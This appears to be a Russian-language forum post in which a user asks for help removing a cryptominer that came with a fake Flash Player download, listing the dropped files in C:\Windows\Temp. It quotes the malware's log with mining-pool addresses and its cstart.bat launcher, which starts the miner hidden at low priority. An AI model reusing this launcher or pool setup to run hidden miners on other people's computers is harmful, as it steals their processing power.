dbgen.exe - 100% загрузкапроцессора [not-a-virus:RiskTool.Win64.BitCoinMiner.dp
]
Добрый вечер эксперты,
Win7 Prof 64bit.
Пытаясь найти в сети видеотрансляцию матча ЧМ2014, скачал flash_player. Внешне он похож был на Flash_Player от Adobe, я заподозрил конечно подвох, но уж очень хотелось побыстрее футбол посмотреть :)
Впоследствии обнаружились следы действия зловреда: в C:\Windows\Temp при загрузке создается набор файлов, один из них dbgen.exe. Он грузит процессор на 100% постоянно. Простая очистка C:\Windows\Temp, конечно, не дает результата - при загрузке файлы появляются вновь.
Вот эти файлы:
[QUOTE]
C:\Windows\Temp\DFFFBA18D57E9F84A92FF9A68DC3CB68-Sigs\ <Ïàïêà> 30.06.14 14:07 ----
C:\Windows\Temp\Low\ <Ïàïêà> 07.06.14 21:22 ----
C:\Windows\Temp\VPN_8D84\ <Ïàïêà> 30.06.14 10:02 ----
C:\Windows\Temp\VPN_017A\ <Ïàïêà> 30.06.14 10:02 ----
C:\Windows\Temp\.unicode_cache_d495c078.dat 1 637 485 29.06.14 22:16 -a--
C:\Windows\Temp\dgen.exe 765 952 30.06.14 10:02 -a--
C:\Windows\Temp\libcurl-4.dll 603 763 12.01.14 01:01 -a--
C:\Windows\Temp\crpt.exe 144 384 30.06.14 10:02 -a--
C:\Windows\Temp\starter.exe 77 713 16.06.14 22:27 -a--
C:\Windows\Temp\pthreadGC2-w64.dll 42 496 06.06.10 03:00 -a--
C:\Windows\Temp\MpCmdRun.log 7 078 30.06.14 14:07 -a--
C:\Windows\Temp\MpSigStub.log 5 324 30.06.14 14:07 -a--
C:\Windows\Temp\lpksetup-20140629-221651-0.log 2 682 29.06.14 22:16 -a--
C:\Windows\Temp\lpksetup-20140630-100249-0.log 2 682 30.06.14 10:02 -a--
C:\Windows\Temp\dbg.log 134 30.06.14 10:02 -a--
C:\Windows\Temp\cstart.bat 83 04.06.14 21:39 -a--
[/QUOTE]
содержимое dbg.log:
[QUOTE]
"C:\Windows\TEMP\cstart.bat" stratum+tcp://jun2.dgensvc.com:6210
"C:\Windows\TEMP\cstart.bat" stratum+tcp://jun9.dgensvc.com:6209
[/QUOTE]
содержимое cstart.bat:
[QUOTE]
cd %~dp0
start /low /B "" "%~dp0dgen.exe" -o %1 -R 5 -a X11 > nul 2>&1
[/QUOTE]